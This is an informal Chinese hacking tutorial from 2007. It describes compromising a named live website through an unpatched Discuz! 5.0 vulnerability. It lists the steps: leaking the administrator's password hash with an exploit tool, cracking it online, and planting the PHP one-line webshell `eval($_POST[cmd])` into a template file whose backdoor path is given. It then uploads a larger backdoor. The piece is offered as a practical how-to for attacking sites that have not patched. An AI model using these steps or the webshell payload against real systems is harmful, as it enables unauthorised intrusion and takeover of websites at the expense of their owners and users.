利用DZ的新漏洞，拿下WEBSHELL！官方网早已有补丁了！只是现在还有许多站点没有打补！

目标：http://www.82168.net
首先，随便注册一个用户！不浪费大家时间 我已经注册好了。。。 直接登陆了
先看一下管理员列表： 
hjjhjjlklkjlkj  1          784dabc12902be1
博彩  2          2007-4-13 2007-4-20 14:25 278 475
              

请出今天主角：Dz5.0 Exp
Url:   目标网址
Hash:  注册用户的HASH
Msgto：注册的用户名

得到管理员的32位MD5加密的密码，我就做快些了，不然等一下又要做成几十M的了！

http://www.cmd5.com  破解一下密码
 
OK破解出来了，我们去登陆一下。OK，成功了~~

拿下WEBSHELL：

进入后台→ 论坛管理→ 模块编辑→ 详情→  点击编辑→ 随便编辑一个

  将PHP一句话木马插入到系统自带的php页面中

  一句话代码 <?php eval($_POST[cmd])?> 插入到此页面中，

  后门地址：网站地址+/templates/default/misc.lang.php

现在拿出一句话木马的客户端

我们来看一下吧！

上传我们大马！

OK!OVER,拜~

                                   BY：二少   QQ:272184561
                          2007.04.20(写了生产日期，不然保质期过了都不知道~_~~)